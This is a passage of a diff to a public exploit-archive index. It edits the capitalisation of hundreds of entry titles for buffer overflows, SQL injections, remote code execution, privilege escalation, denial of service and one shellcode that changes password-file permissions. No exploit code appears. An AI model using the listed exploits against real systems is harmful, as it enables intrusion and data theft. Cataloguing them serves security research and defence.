WebShield E-ppliance 100.0/300.0 / IRIX 6.5.x - Remote Buffer Overflow",2000-05-18,_Gramble_,irix,remote,0 +19949,platforms/irix/remote/19949.c,"Gauntlet Firewall 4.1/4.2/5.0 / Webshield E-ppliance 100.0/300.0 / IRIX 6.5.x - Remote Buffer Overflow",2000-05-18,_Gramble_,irix,remote,0 19950,platforms/linux/dos/19950.c,"XFree86 X11R6 3.3.5/3.3.6/4.0 Xserver - Denial of Service",2000-05-18,"Chris Evans",linux,dos,0 19951,platforms/cgi/remote/19951.php,"QuickCommerce 2.5/3.0 / Cart32 2.5 a/3.0 / Shop Express 1.0 / StoreCreator 3.0 Web Shopping Cart - Hidden Form Field",2000-02-01,CDI,cgi,remote,0 19952,platforms/linux/local/19952.c,"S.u.S.E. 4.x/5.x/6.x/7.0 / Slackware 3.x/4.0 / Turbolinux 6 / OpenLinux 7.0 - fdmount Buffer Overflow (1)",2000-05-22,"Paulo Ribeiro",linux,local,0 @@ -17313,10 +17314,10 @@ id,file,description,date,author,platform,type,port 19957,platforms/windows/remote/19957.txt,"Pacific Software Carello 1.2.1 - File Duplication / Source Disclosure",2000-05-24,"Cerberus Security Team",windows,remote,0 19958,platforms/windows/remote/19958.rb,"Novell ZENworks Configuration Management Preboot Service - 0x6c Buffer Overflow",2012-07-20,Metasploit,windows,remote,0 19959,platforms/windows/remote/19959.rb,"Novell ZENworks Configuration Management Preboot Service - 0x4c Buffer Overflow",2012-07-20,Metasploit,windows,remote,998 -19961,platforms/windows/dos/19961.txt,"Oracle Outside-In - .LWP File Parsing Stack Based Buffer Overflow",2012-07-20,"Francis Provencher",windows,dos,0 +19961,platforms/windows/dos/19961.txt,"Oracle Outside-In - '.LWP' File Parsing Stack Based Buffer Overflow",2012-07-20,"Francis Provencher",windows,dos,0 19962,platforms/windows/dos/19962.txt,"Oracle Outside-In JP2 - File Parsing Heap Overflow",2012-07-20,"Francis Provencher",windows,dos,0 19967,platforms/multiple/local/19967.txt,"Omnis Studio 2.4 - Weak Database Field Encryption",2000-05-25,Eric.Stevens,multiple,local,0 -19968,platforms/windows/local/19968.c,"Windows 2000/95/98/NT 4.0 - Long Filename Extension",2000-04-21,"Laurent Eschenauer",windows,local,0 +19968,platforms/windows/local/19968.c,"Microsoft Windows 2000/95/98/NT 4.0 - Long Filename Extension",2000-04-21,"Laurent Eschenauer",windows,local,0 19969,platforms/linux/local/19969.c,"Mandriva Linux Mandrake 7.0 - Buffer Overflow",2000-05-29,noir,linux,local,0 19970,platforms/linux/local/19970.c,"KDE 1.1 - /1.1.1/1.1.2/1.2 kdesud DISPLAY Environment Variable Overflow",2000-05-27,noir,linux,local,0 19971,platforms/unix/local/19971.c,"Elm Development Group ELM 2.4/2.5.1 Mail for UNIX - (ELM) Buffer Overflow (1)",2000-05-07,Scrippie,unix,local,0 @@ -17325,7 +17326,7 @@ id,file,description,date,author,platform,type,port 19974,platforms/windows/dos/19974.c,"Microsoft Windows Media Services 4.0/4.1 - Denial of Service",2000-05-31,"Kit Knox",windows,dos,0 19975,platforms/windows/remote/19975.pl,"Apache 1.3.6/1.3.9/1.3.11/1.3.12/1.3.20 - Root Directory Access",2000-05-31,"H D Moore",windows,remote,0 19976,platforms/windows/remote/19976.txt,"Concatus IMate Web Mail Server 2.5 - Buffer Overflow",2000-06-01,"Delphis Consulting",windows,remote,0 -19977,platforms/multiple/dos/19977.txt,"Real Networks Real Server 7.0/7.0.1/8.0 Beta - View-Source Denial of Service",2000-06-01,"Ussr Labs",multiple,dos,0 +19977,platforms/multiple/dos/19977.txt,"Real Networks Real Server 7.0/7.0.1/8.0 Beta - view-source Denial of Service",2000-06-01,"Ussr Labs",multiple,dos,0 19978,platforms/linux/remote/19978.pl,"Atrus Trivalie Productions Simple Network Time Sync 1.0 - daemon Buffer Overflow",2000-06-01,"Ben Taylor",linux,remote,0 19979,platforms/linux/local/19979.pl,"KDE 1.1.2 KApplication configfile - Exploit (1)",2000-05-31,kil3r,linux,local,0 19980,platforms/linux/local/19980.pl,"KDE 1.1.2 KApplication configfile - Exploit (2)",2000-05-31,kil3r,linux,local,0 @@ -17333,8 +17334,8 @@ id,file,description,date,author,platform,type,port 19982,platforms/bsd/dos/19982.c,"FreeBSD 3.x/4.0/5.0 / NetBSD 1.4.1/1.4.2 / OpenBSD 2.x - Denial of Service",2000-06-01,"Ussr Labs",bsd,dos,0 19983,platforms/linux/remote/19983.c,"NetWin DMail 2.7/2.8 - ETRN Buffer Overflow",2000-06-01,noir,linux,remote,0 19984,platforms/multiple/dos/19984.c,"Eterm 0.8.10 / rxvt 2.6.1 / PuTTY 0.48 / X11R6 3.3.3/4.0 - Denial of Service",2000-05-31,"Kit Knox",multiple,dos,0 -19985,platforms/php/webapps/19985.txt,"NetArt Media iBoutique 4.0 - (index.php key parameter) SQL Injection",2012-07-20,"SecPod Research",php,webapps,0 -19986,platforms/windows/dos/19986.txt,"Oxide Webserver 2.0.4 - Denial of Service",2012-07-20,"SecPod Research",windows,dos,0 +19985,platforms/php/webapps/19985.txt,"NetArt Media iBoutique 4.0 - (index.php key Parameter) SQL Injection",2012-07-20,"SecPod Research",php,webapps,0 +19986,platforms/windows/dos/19986.txt,"Oxide WebServer 2.0.4 - Denial of Service",2012-07-20,"SecPod Research",windows,dos,0 19987,platforms/linux/dos/19987.py,"ptunnel 0.72 - Remote Denial of Service",2012-07-20,st3n,linux,dos,0 19988,platforms/windows/dos/19988.pl,"httpdx 1.5.4 - Remote HTTP Server Denial of Service",2012-07-20,st3n,windows,dos,0 19989,platforms/windows/local/19989.c,"PassWD 1.2 - Weak Encryption",2000-06-04,"Daniel Roethlisberger",windows,local,0 @@ -17348,17 +17349,17 @@ id,file,description,date,author,platform,type,port 19997,platforms/windows/remote/19997.java,"Etype Eserv 2.9.2 - Logging Buffer Overflow",2000-05-10,Wizdumb,windows,remote,0 19998,platforms/linux/remote/19998.c,"ISC innd 2.x - Remote Buffer Overflow",2000-06-12,"Michal Zalewski",linux,remote,0 19999,platforms/multiple/local/19999.txt,"BRU 15.1/16.0 - BRUEXECLOG Environment Variable",2000-06-05,"Riley Hassell",multiple,local,0 -20000,platforms/linux/local/20000.c,"Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - Capabilities Privilege Escalation (sendmail) (1)",2000-06-07,"Florian Heinz",linux,local,0 +20000,platforms/linux/local/20000.c,"Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - Capabilities Privilege Escalation (Sendmail) (1)",2000-06-07,"Florian Heinz",linux,local,0 20001,platforms/linux/local/20001.sh,"Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - Capabilities Privilege Escalation (Sendmail 8.10.1) (2)",2000-06-07,"Wojciech Purczynski",linux,local,0 20002,platforms/hp-ux/local/20002.txt,"HP-UX 10.20/11.0 - SNMPD File Permission Vulnerabilities",2000-06-07,loveyou,hp-ux,local,0 20003,platforms/solaris/local/20003.txt,"Intel Corporation Shiva Access Manager 5.0 - Solaris World Readable LDAP Password",2000-06-06,"Blaise St. Laurent",solaris,local,0 20004,platforms/linux/local/20004.c,"Stelian Pop dump 0.4 - restore Buffer Overflow",2000-06-07,"Stan Bubrouski",linux,local,0 -20005,platforms/windows/dos/20005.c,"Windows NT 4.0 - Remote Registry Request Denial of Service (1)",2000-06-08,"Renaud Deraison",windows,dos,0 -20006,platforms/windows/dos/20006.nasl,"Windows NT 4.0 - Remote Registry Request Denial of Service (2)",2000-06-08,"Renaud Deraison",windows,dos,0 +20005,platforms/windows/dos/20005.c,"Microsoft Windows NT 4.0 - Remote Registry Request Denial of Service (1)",2000-06-08,"Renaud Deraison",windows,dos,0 +20006,platforms/windows/dos/20006.nasl,"Microsoft Windows NT 4.0 - Remote Registry Request Denial of Service (2)",2000-06-08,"Renaud Deraison",windows,dos,0 20007,platforms/cgi/remote/20007.c,"3R Soft MailStudio 2000 2.0 - userreg.cgi Arbitrary Command Execution",2000-04-24,fygrave,cgi,remote,0 20008,platforms/cgi/remote/20008.txt,"3R Soft MailStudio 2000 2.0 - Arbitrary File Access",2000-06-09,s0ftpr0ject,cgi,remote,0 -20009,platforms/linux/remote/20009.py,"atmail email server appliance 6.4 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Remote Code Execution",2012-07-21,muts,linux,remote,0 -20011,platforms/windows/webapps/20011.js,"solarwinds orion network performance monitor 10.2.2 - Multiple Vulnerabilities",2012-07-21,muts,windows,webapps,0 +20009,platforms/linux/remote/20009.py,"atmail email server Appliance 6.4 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Remote Code Execution",2012-07-21,muts,linux,remote,0 +20011,platforms/windows/webapps/20011.js,"SolarWinds orion network performance monitor 10.2.2 - Multiple Vulnerabilities",2012-07-21,muts,windows,webapps,0 20012,platforms/windows/local/20012.txt,"Computer Associates eTrust Intrusion Detection 1.4.1.13 - Weak Encryption",2000-06-07,Phate.net,windows,local,0 20013,platforms/linux/local/20013.c,"Sam Lantinga splitvt 1.6.3 - Buffer Overflow",2000-06-01,Syzop,linux,local,0 20014,platforms/solaris/local/20014.c,"Solaris 2.5/2.6/7.0/8 ufsrestore - Buffer Overflow",2000-06-14,"Job de Haas of ITSX",solaris,local,0 @@ -17380,11 +17381,11 @@ id,file,description,date,author,platform,type,port 20030,platforms/unix/remote/20030.c,"WU-FTPD 2.4.2/2.5 .0/2.6.0 - Remote Format String Stack Overwrite (1)",1999-10-15,tf8,unix,remote,0 20031,platforms/linux/remote/20031.c,"WU-FTPD 2.4.2/2.5 .0/2.6.0 - Remote Format String Stack Overwrite (2)",2000-09-26,vsz_,linux,remote,0 20032,platforms/lin_x86/remote/20032.txt,"WU-FTPD 2.4.2/2.5 .0/2.6.0 - Remote Format String Stack Overwrite (3)",2001-05-04,justme,lin_x86,remote,0 -20033,platforms/php/webapps/20033.py,"Dell SonicWALL Scrutinizer 9.0.1 - (statusFilter.php q parameter) SQL Injection",2012-07-22,muts,php,webapps,0 +20033,platforms/php/webapps/20033.py,"Dell SonicWALL Scrutinizer 9.0.1 - (statusFilter.php q Parameter) SQL Injection",2012-07-22,muts,php,webapps,0 20035,platforms/asp/webapps/20035.js,"ipswitch whatsup gold 15.02 - Persistent Cross-Site Scripting / Blind SQL Injection / Remote Code Execution",2012-07-22,muts,asp,webapps,0 20036,platforms/windows/local/20036.pl,"Photodex ProShow Producer 5.0.3256 - Local Buffer Overflow",2012-07-23,mr.pr0n,windows,local,0 20037,platforms/linux/webapps/20037.txt,"Atmail WebAdmin and Webmail Control Panel - SQL Root Password Disclosure",2012-07-23,Ciph3r,linux,webapps,0 -20038,platforms/linux/webapps/20038.py,"Symantec Web Gateway 5.0.2 - (blocked.php id parameter) Blind SQL Injection",2012-07-23,muts,linux,webapps,0 +20038,platforms/linux/webapps/20038.py,"Symantec Web Gateway 5.0.2 - (blocked.php id Parameter) Blind SQL Injection",2012-07-23,muts,linux,webapps,0 20039,platforms/windows/dos/20039.java,"LeafDigital LeafChat 1.7 - Denial of Service",2000-06-25,"MDMA Crew",windows,dos,0 20040,platforms/windows/remote/20040.c,"SapporoWorks WinProxy 2.0/2.0.1 - Buffer Overflow",2000-06-27,UNYUN,windows,remote,0 20041,platforms/cgi/remote/20041.txt,"Flowerfire Sawmill 5.0.21 - File Access",2000-06-26,"Larry W. Cashdollar",cgi,remote,0 @@ -17399,7 +17400,7 @@ id,file,description,date,author,platform,type,port 20050,platforms/hardware/dos/20050.c,"Check Point Software Firewall-1 3.0/1.4.0/1.4.1 - Spoofed Source Denial of Service",2000-07-05,lore,hardware,dos,0 20051,platforms/windows/dos/20051.c,"Sybergen SyGate 2.0/3.11 - Denial of Service",2000-06-30,"Marc of eEye",windows,dos,0 20052,platforms/multiple/dos/20052.txt,"Centrinity FirstClass 5.77 - Intranet Server Long Header Denial of Service",2000-06-27,"Adam Prime",multiple,dos,0 -20053,platforms/windows/local/20053.py,"MyMp3 Player Stack - .m3u DEP Bypass Exploit",2012-07-23,"Daniel Romero",windows,local,0 +20053,platforms/windows/local/20053.py,"MyMp3 Player Stack - '.m3u' DEP Bypass Exploit",2012-07-23,"Daniel Romero",windows,local,0 20054,platforms/windows/dos/20054.pl,"West Street Software LocalWEB HTTP Server 1.2 - Buffer Overflow",2000-07-04,"Ussr Labs",windows,dos,0 20055,platforms/php/webapps/20055.txt,"MySQL Squid Access Report 2.1.4 - HTML Injection",2012-07-23,"Daniel Godoy",php,webapps,0 20056,platforms/unix/local/20056.c,"Visible Systems Razor 4.1 - Password File (1)",2000-06-16,pbw,unix,local,0 @@ -17407,15 +17408,15 @@ id,file,description,date,author,platform,type,port 20059,platforms/cgi/remote/20059.txt,"CGI-World Poll It 2.0 - Internal Variable Override",2000-07-04,"Adrian Daminato",cgi,remote,0 20060,platforms/linux/remote/20060.c,"BitchX IRC Client 75p1/75p3/1.0 c16 - '/INVITE' Format String",2000-07-05,RaiSe,linux,remote,0 20061,platforms/linux/remote/20061.c,"Canna Canna 3.5 b2 - Remote Buffer Overflow",2000-07-02,UNYUN,linux,remote,0 -20062,platforms/php/webapps/20062.py,"AlienVault OSSIM 3.1 - Reflected Cross-Site Scripting / Blind SQL Injection",2012-07-23,muts,php,webapps,0 -20063,platforms/windows/webapps/20063.txt,"Spiceworks 5.3.75941 - Persistent Cross-Site Scripting / Post-Authenticated SQL Injection",2012-07-23,dookie,windows,webapps,0 +20062,platforms/php/webapps/20062.py,"Alienvault OSSIM 3.1 - Reflected Cross-Site Scripting / Blind SQL Injection",2012-07-23,muts,php,webapps,0 +20063,platforms/windows/webapps/20063.txt,"SpiceWorks 5.3.75941 - Persistent Cross-Site Scripting / Post-Authentication SQL Injection",2012-07-23,dookie,windows,webapps,0 20064,platforms/linux/remote/20064.py,"Symantec Web Gateway 5.0.3.18 - Local/Remote File Inclusion (Root Remote Code Execution) Exploit",2012-07-24,muts,linux,remote,0 20065,platforms/windows/remote/20065.txt,"DrPhibez and Nitro187 Guild FTPD 0.9.7 - File Existence Disclosure",2000-07-08,"Andrew Lewis",windows,remote,0 20066,platforms/windows/remote/20066.java,"Michael Lamont Savant WebServer 2.1/3.0 - Buffer Overflow",2000-07-03,Wizdumb,windows,remote,0 20067,platforms/hardware/remote/20067.c,"PIX Firewall 2.7/3.x/4.x/5 - Forged TCP RST",2000-07-10,"Citec Network Securities",hardware,remote,0 20068,platforms/cgi/remote/20068.txt,"Sean MacGuire Big Brother 1.x - Directory Traversal",2000-07-11,"Eric Hines",cgi,remote,0 20069,platforms/windows/dos/20069.pl,"Texas Imperial Software WFTPD 2.4.1 - RNTO Denial of Service",2000-07-11,"Blue Panda",windows,dos,0 -20070,platforms/windows/remote/20070.txt,"alt-n worldclient standard 2.1 - Directory Traversal",2000-07-12,"Rikard Carlsson",windows,remote,0 +20070,platforms/windows/remote/20070.txt,"alt-n WorldClient standard 2.1 - Directory Traversal",2000-07-12,"Rikard Carlsson",windows,remote,0 20071,platforms/cgi/dos/20071.c,"Mirabilis ICQ 0.99/98.0 a/2000.0 A/99a - Remote Denial of Service Attack",2000-03-10,"Charles Chear",cgi,dos,0 20072,platforms/novell/dos/20072.txt,"Novell Netware 5.0 SP5/6.0 SP1 - SMDR.NLM Denial of Service",2000-07-11,"Dimuthu Parussalla",novell,dos,0 20073,platforms/unix/local/20073.txt,"CVSWeb Developer CVSWeb 1.80 - Insecure perl 'open'",2000-07-12,"Joey Hess",unix,local,0 @@ -17428,17 +17429,17 @@ id,file,description,date,author,platform,type,port 20080,platforms/windows/dos/20080.c,"Computer Software Manufaktur Alibaba 2.0 - Denial of Service",2000-07-18,wildcoyote,windows,dos,0 20081,platforms/windows/local/20081.c,"NetZero ZeroPort 3.0 - Weak Encryption Method",2000-07-18,"Brian Carrier",windows,local,0 20082,platforms/unix/remote/20082.txt,"University of Washington pop2d 4.46/4.51/4.54/4.55 - Remote File Read",2000-07-14,mandark,unix,remote,0 -20083,platforms/php/webapps/20083.txt,"Wordpress Front End Upload 0.5.4.4 Plugin - Arbitrary PHP File Upload",2012-07-24,"Chris Kellum",php,webapps,0 +20083,platforms/php/webapps/20083.txt,"WordPress Front End Upload 0.5.4.4 Plugin - Arbitrary PHP File Upload",2012-07-24,"Chris Kellum",php,webapps,0 20085,platforms/cgi/remote/20085.txt,"Computer Software Manufaktur Alibaba 2.0 - Piped Command",2000-07-18,Prizm,cgi,remote,0 20086,platforms/windows/remote/20086.c,"OReilly Software WebSite Professional 2.3.18/2.4/2.4.9 - 'webfind.exe' Buffer Overflow",2000-06-01,"Robert Horton",windows,remote,0 20087,platforms/php/webapps/20087.py,"Zabbix 2.0.1 - Session Extractor",2012-07-24,muts,php,webapps,0 -20088,platforms/linux/remote/20088.py,"Symantec Web Gateway 5.0.3.18 - pbcontrol.php ROOT Remote Code Execution Exploit",2012-07-24,muts,linux,remote,0 +20088,platforms/linux/remote/20088.py,"Symantec Web Gateway 5.0.3.18 - pbcontrol.php ROOT Remote Code Execution",2012-07-24,muts,linux,remote,0 20089,platforms/windows/remote/20089.txt,"Microsoft IIS 4.0/5.0 - Source Fragment Disclosure",2000-07-17,"Zuo Lei",windows,remote,0 20090,platforms/hardware/dos/20090.txt,"HP JetDirect J3111A - Invalid FTP Command Denial of Service",2000-07-19,"Peter Grundl",hardware,dos,0 -20091,platforms/multiple/remote/20091.txt,"Stalker Communigate Pro 3.2.4 - Arbitrary File Read",2000-04-03,S21Sec,multiple,remote,0 +20091,platforms/multiple/remote/20091.txt,"Stalker CommuniGate Pro 3.2.4 - Arbitrary File Read",2000-04-03,S21Sec,multiple,remote,0 20092,platforms/cgi/local/20092.txt,"Sean MacGuire Big Brother 1.0/1.3/1.4 - CGI File Creation",2001-06-11,xternal,cgi,local,0 20093,platforms/linux/local/20093.c,"Stanley T. Shebs Xconq 7.2.2 - xconq Buffer Overflow",2000-06-22,V9,linux,local,0 -20094,platforms/windows/dos/20094.txt,"NullSoft Winamp 2.64 - .m3u Playlist Buffer Overflow",2001-01-17,"Pauli Ojanpera",windows,dos,0 +20094,platforms/windows/dos/20094.txt,"NullSoft Winamp 2.64 - '.m3u' Playlist Buffer Overflow",2001-01-17,"Pauli Ojanpera",windows,dos,0 20095,platforms/multiple/remote/20095.txt,"Sun Java Web Server 1.1.3/2.0 Servlets - Exploits",2000-07-20,"kevin j",multiple,remote,0 20096,platforms/windows/remote/20096.txt,"Microsoft IIS 2.0/3.0/4.0/5.0/5.1 - Internal IP Address Disclosure",2000-07-13,"Dougal Campbell",windows,remote,0 20097,platforms/multiple/remote/20097.txt,"IBM Websphere Application Server 2.0./3.0/3.0.2.1 - Showcode",2000-07-24,"Shreeraj Shah",multiple,remote,0 @@ -17447,8 +17448,8 @@ id,file,description,date,author,platform,type,port 20100,platforms/windows/dos/20100.pl,"WFTPD 2.4.1RC11 - STAT/LIST Command Denial of Service",2000-07-21,"Blue Panda",windows,dos,0 20101,platforms/windows/dos/20101.pl,"WFTPD 2.4.1RC11 REST Command - Malformed File Write Denial of Service",2000-07-21,"Blue Panda",windows,dos,0 20102,platforms/windows/dos/20102.pl,"WFTPD 2.4.1RC11 - Unauthenticated MLST Command Remote Denial of Service",2000-07-21,"Blue Panda",windows,dos,0 -20103,platforms/windows/remote/20103.txt,"analogx simpleserver:www 1.0.6 - Directory Traversal",2000-07-26,"Foundstone Inc.",windows,remote,0 -20104,platforms/multiple/remote/20104.txt,"Roxen WebServer 2.0.x - %00 Request File/Directory Disclosure",2000-07-21,zorgon,multiple,remote,0 +20103,platforms/windows/remote/20103.txt,"analogx SimpleServer:WWW 1.0.6 - Directory Traversal",2000-07-26,"Foundstone Inc.",windows,remote,0 +20104,platforms/multiple/remote/20104.txt,"Roxen WebServer 2.0.x - '%00' Request File/Directory Disclosure",2000-07-21,zorgon,multiple,remote,0 20105,platforms/linux/remote/20105.txt,"Conectiva 4.x/5.x / RedHat 6.x - pam_console Remote User",2000-07-27,bkw1a,linux,remote,0 20106,platforms/windows/remote/20106.cpp,"Microsoft Windows NT 4/2000 - NetBIOS Name Conflict",2000-08-01,"Sir Dystic",windows,remote,0 20107,platforms/unix/local/20107.txt,"CVS Kit CVS Server 1.10.8 - Instructed File Create",2000-07-28,"Tanaka Akira",unix,local,0 @@ -17459,10 +17460,10 @@ id,file,description,date,author,platform,type,port 20116,platforms/windows/local/20116.py,"Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - Buffer Overflow (ASLR + DEP Bypass)",2012-07-27,"Ptrace Security",windows,local,0 20301,platforms/windows/remote/20301.php,"Microsoft IIS 4.0/5.0 and PWS - Extended Unicode Directory Traversal (4)",2000-10-17,BoloTron,windows,remote,0 20145,platforms/linux/remote/20145.c,"Aptis Software TotalBill 3.0 - Remote Command Execution",2000-08-08,"Brian Masney",linux,remote,0 -20123,platforms/php/webapps/20123.py,"Symantec Web Gateway 5.0.3.18 - (deptUploads_data.php groupid parameter) Blind SQL Injection",2012-07-30,Kc57,php,webapps,0 +20123,platforms/php/webapps/20123.py,"Symantec Web Gateway 5.0.3.18 - (deptUploads_data.php groupid Parameter) Blind SQL Injection",2012-07-30,Kc57,php,webapps,0 20124,platforms/windows/webapps/20124.txt,"Dr. Web Control Center 6.00.3.201111300 - Cross-Site Scripting",2012-07-31,"Oliver Karow",windows,webapps,0 20125,platforms/windows/remote/20125.txt,"Weblogic 3.1.8/4.0.4/4.5.1 - Remote Command Execution",2000-08-01,"Foundstone Inc.",windows,remote,0 -20126,platforms/irix/local/20126.c,"IRIX 6.5.x - gr_osview Buffer Overflow",1997-01-01,"Last Stage of Delirium",irix,local,0 +20126,platforms/irix/local/20126.c,"IRIX 6.5.x - GR_OSView Buffer Overflow",1997-01-01,"Last Stage of Delirium",irix,local,0 20127,platforms/irix/local/20127.c,"SGI IRIX 6.2 libgl.so - Buffer Overflow",1997-09-01,"Last Stage of Delirium",irix,local,0 20128,platforms/irix/local/20128.c,"IRIX 6.5.x - dmplay Buffer Overflow",2000-08-02,"Last Stage of Delirium",irix,local,0 20129,platforms/irix/local/20129.c,"IRIX 6.2/6.3 lpstat - Buffer Overflow",1998-11-01,"Last Stage of Delirium",irix,local,0 @@ -17522,12 +17523,12 @@ id,file,description,date,author,platform,type,port 20185,platforms/linux/local/20185.c,"RedHat 6 - glibc/locale Subsystem Format String",2000-09-06,warning3,linux,local,0 20186,platforms/solaris/local/20186.c,"Solaris 2.6/7.0 - /locale Subsystem Format String",2000-11-02,warning3,solaris,local,0 20187,platforms/immunix/local/20187.c,"Immunix OS 6.2 - LC glibc format string",2000-09-04,"Kil3r of Lam3rZ",immunix,local,0 -20188,platforms/solaris/local/20188.c,"Solaris 2.6/7.0 - 'eject' locale subsystem Format String Exploit",2000-09-08,warning3,solaris,local,0 +20188,platforms/solaris/local/20188.c,"Solaris 2.6/7.0 - 'eject' locale Subsystem Format String Exploit",2000-09-08,warning3,solaris,local,0 20189,platforms/unix/local/20189.c,"Libc locale - Exploit (1)",2000-09-04,Synnergy.net,unix,local,0 20190,platforms/unix/local/20190.c,"Libc locale - Exploit (2)",2000-09-04,anonymous,unix,local,0 20191,platforms/bsd/local/20191.c,"Juergen Weigert screen 3.9 - User Supplied Format String",2000-09-05,IhaQueR@IRCnet,bsd,local,0 20192,platforms/unix/dos/20192.txt,"LPPlus 3.2.2/3.3 - Permissions Denial of Service",2000-09-06,"Dixie Flatline",unix,dos,0 -20193,platforms/unix/local/20193.txt,"LPPlus 3.2.2/3.3 - dccscan unprivileged read",2000-09-06,"Dixie Flatline",unix,local,0 +20193,platforms/unix/local/20193.txt,"LPPlus 3.2.2/3.3 - dccscan Unprivileged read",2000-09-06,"Dixie Flatline",unix,local,0 20194,platforms/cgi/remote/20194.pl,"CGI Script Center Auction Weaver 1.0.2 - Remote Command Execution",2000-08-30,teleh0r,cgi,remote,0 20196,platforms/lin_x86/shellcode/20196.c,"Linux/x86 - chmod 666 /etc/passwd & /etc/shadow Shellcode (57 bytes)",2012-08-02,"Jean Pascal Pereira",lin_x86,shellcode,0 20197,platforms/php/webapps/20197.txt,"joomla joomgalaxy 1.2.0.4 - Multiple Vulnerabilities",2012-08-02,D4NB4R,php,webapps,0 @@ -17540,7 +17541,7 @@ id,file,description,date,author,platform,type,port 20204,platforms/windows/remote/20204.rb,"Dell SonicWALL Scrutinizer 9 - SQL Injection",2012-08-03,Metasploit,windows,remote,0 20205,platforms/unix/remote/20205.rb,"Zenoss 3 - showDaemonXMLConfig Command Execution",2012-08-03,Metasploit,unix,remote,8080 20206,platforms/multiple/remote/20206.txt,"QSSL Voyager 2.0 1B - Arbitrary File Access",2000-09-01,neonbunny,multiple,remote,0 -20207,platforms/multiple/remote/20207.txt,"QSSL Voyager 2.0 1B - .photon Directory Information Disclosure",2000-09-01,neonbunny,multiple,remote,0 +20207,platforms/multiple/remote/20207.txt,"QSSL Voyager 2.0 1B - '.photon' Directory Information Disclosure",2000-09-01,neonbunny,multiple,remote,0 20208,platforms/php/webapps/20208.txt,"nathan purciful phpphotoalbum 0.9.9 - Directory Traversal",2000-09-07,pestilence,php,webapps,0 20209,platforms/windows/local/20209.cpp,"Microsoft Windows 2000 - Still Image Service Privilege Escalation",2000-09-06,dildog,windows,local,0 20210,platforms/linux/remote/20210.txt,"Apache 1.3.12 - WebDAV Directory Listings",2000-09-07,Mnemonix,linux,remote,0 @@ -17560,7 +17561,7 @@ id,file,description,date,author,platform,type,port 20224,platforms/windows/remote/20224.txt,"CamShot WebCam 2.6 Trial - Remote Buffer Overflow",2000-09-15,SecuriTeam,windows,remote,0 20225,platforms/windows/dos/20225.pl,"Alt-N MDaemon 3.1.1 - Denial of Service",1999-12-01,"Ussr Labs",windows,dos,0 20226,platforms/freebsd/dos/20226.c,"FreeBSD Kernel - SCTP Remote NULL Ptr Dereference Denial of Service",2012-08-03,"Shaun Colley",freebsd,dos,0 -20542,platforms/windows/local/20542.rb,"globalSCAPE CuteZIP - Stack Buffer Overflow",2012-08-15,Metasploit,windows,local,0 +20542,platforms/windows/local/20542.rb,"GlobalScape CuteZIP - Stack Buffer Overflow",2012-08-15,Metasploit,windows,local,0 20228,platforms/windows/dos/20228.pl,"TYPSoft 0.7 x - FTP Server Remote Denial of Service",1999-06-08,dethy,windows,dos,0 20229,platforms/multiple/dos/20229.txt,"IBM Websphere Application Server 3.0.2 Server Plugin - Denial of Service",2000-09-15,"Rude Yak",multiple,dos,0 20230,platforms/sco/local/20230.c,"Tridia DoubleVision 3.0 7.00 - Privilege Escalation",2000-06-24,"Stephen J. Friedl",sco,local,0 @@ -17583,10 +17584,10 @@ id,file,description,date,author,platform,type,port 20247,platforms/windows/remote/20247.txt,"Smartwin Technology CyberOffice Shopping Cart 2.0 - Price Modification",2000-10-02,"Delphis Consulting",windows,remote,0 20248,platforms/windows/remote/20248.txt,"SmartWin CyberOffice Shopping Cart 2.0 - Client Information Disclosure",2000-10-02,DCIST,windows,remote,0 20249,platforms/windows/remote/20249.txt,"David Harris Pegasus Mail 3.12 - File Forwarding",2000-10-03,"Imran Ghory",windows,remote,0 -20250,platforms/linux/local/20250.c,"LBL traceroute 1.4 a5 - Heap Corruption (1)",2000-09-28,Dvorak,linux,local,0 -20251,platforms/linux/local/20251.c,"LBL traceroute 1.4 a5 - Heap Corruption (2)",2000-09-28,"Perry Harrington",linux,local,0 -20252,platforms/linux/local/20252.c,"LBL traceroute 1.4 a5 - Heap Corruption (3)",2000-09-28,"Michel Kaempf",linux,local,0 -20253,platforms/linux/remote/20253.sh,"OpenSSH 1.2 - .scp File Create/Overwrite",2000-09-30,"Michal Zalewski",linux,remote,0 +20250,platforms/linux/local/20250.c,"LBL Traceroute 1.4 a5 - Heap Corruption (1)",2000-09-28,Dvorak,linux,local,0 +20251,platforms/linux/local/20251.c,"LBL Traceroute 1.4 a5 - Heap Corruption (2)",2000-09-28,"Perry Harrington",linux,local,0 +20252,platforms/linux/local/20252.c,"LBL Traceroute 1.4 a5 - Heap Corruption (3)",2000-09-28,"Michel Kaempf",linux,local,0 +20253,platforms/linux/remote/20253.sh,"OpenSSH 1.2 - '.scp' File Create/Overwrite",2000-09-30,"Michal Zalewski",linux,remote,0 20254,platforms/windows/dos/20254.txt,"Microsoft Windows NT 4.0 - Invalid LPC Request Denial of Service",2000-10-03,"BindView's Razor Team",windows,dos,0 20255,platforms/windows/dos/20255.txt,"Microsoft Windows NT 4.0 / 2000 - LPC Zone Memory Depletion Denial of Service",2000-10-03,"BindView's Razor Team",windows,dos,0 20256,platforms/openbsd/local/20256.c,"OpenBSD 2.x - fstat Format String",2000-10-04,K2,openbsd,local,0 @@ -17594,30 +17595,30 @@ id,file,description,date,author,platform,type,port 20258,platforms/multiple/remote/20258.c,"HP-UX 10/11/ IRIX 3/4/5/6 / OpenSolaris build snv / Solaris 8/9/10 / SunOS 4.1 - rpc.ypupdated Command Execution (1)",1994-02-07,"Josh D",multiple,remote,0 20259,platforms/multiple/remote/20259.txt,"HP-UX 10/11/ IRIX 3/4/5/6 / OpenSolaris build snv / Solaris 8/9/10 / SunOS 4.1 - rpc.ypupdated Command Execution (2)",1994-02-07,anonymous,multiple,remote,0 20260,platforms/php/webapps/20260.txt,"Islamnt Islam Forum Script 1.2 - Blind SQL Injection",2012-08-05,s3n4t00r,php,webapps,0 -20543,platforms/windows/local/20543.rb,"Windows - Service Trusted Path Privilege Escalation",2012-08-15,Metasploit,windows,local,0 +20543,platforms/windows/local/20543.rb,"Microsoft Windows - Service Trusted Path Privilege Escalation",2012-08-15,Metasploit,windows,local,0 20500,platforms/php/remote/20500.rb,"TestLink 1.9.3 - Arbitrary File Upload",2012-08-15,Metasploit,php,remote,0 -20262,platforms/windows/local/20262.py,"CoolPlayer 